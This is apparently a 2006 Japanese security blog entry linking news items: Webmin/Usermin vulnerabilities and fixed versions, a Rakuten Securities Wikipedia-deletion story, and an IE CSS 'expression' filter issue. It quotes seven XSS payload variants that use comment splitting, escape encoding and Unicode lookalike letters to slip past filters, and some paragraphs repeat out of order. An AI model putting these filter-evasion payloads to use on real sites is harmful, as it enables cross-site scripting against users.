2006/08/31(木)木曜日ー。(月末。)
[セキュリティ] * [openmya:035806] IE における "expression" の過剰検出による XSS の誘因
経由。 これらを組み合わせられたら・・・フィルタ泣かせですね。^^;[出来事] * 楽天証券、Wikipediaの記述削除を認める〜社員を処分 (INTERNET Watch)
経由。 あぅ・・・。 これ以上、太らないように気をつけますw[セキュリティ] * システム管理ツール「Webmin」と「Usermin」にまたもやセキュリティ・ホール (ITPro)
当初、どのバージョンなら安全なんだ?! というのが分からなかった * IPA
、* JVN
ですが、結局は Webmin 1.296以降、Usermin 1.226以降なら安全なようです。 * Development Versions
で修正。
textile1) <style>input { left:expression( alert('xss') ) } </style>
2) <div style="{ left:expression( alert('xss') ) }">
3) <div style="{ left:exp/* */ression( alert('xss') ) }">
4) <div style="{ left:\0065\0078pression( alert('xss') ) }">
5) <div style="{ left:expression( alert('xss') ) }">
6) <div style="{ left:expression( alert('xss') ) }">
7) <div style="{ left:expRessioN( alert('xss') ) }">
R は U+0280、N は U+0274 または U+207F が利用可能です。
- 葉っぱさん
経由。 これらを組み合わせられたら・・・フィルタ泣かせですね。^^;[出来事] * 楽天証券、Wikipediaの記述削除を認める〜社員を処分 (INTERNET Watch)
textile楽天証券では、「弊社の従業員が個人の判断で削除したことが確認された」とコメント。この社員に対しては、社内処分を実施したという。どうゆう根拠で “処分” したんでしょうねー。 インターネットの業務外利用かな?[雑談] * 「ITエンジニア不健康伝説」は本当か (@IT)
- やたさん
経由。 あぅ・・・。 これ以上、太らないように気をつけますw[セキュリティ] * システム管理ツール「Webmin」と「Usermin」にまたもやセキュリティ・ホール (ITPro)
当初、どのバージョンなら安全なんだ?! というのが分からなかった * IPA
、* JVN
ですが、結局は Webmin 1.296以降、Usermin 1.226以降なら安全なようです。 * Development Versions
で修正。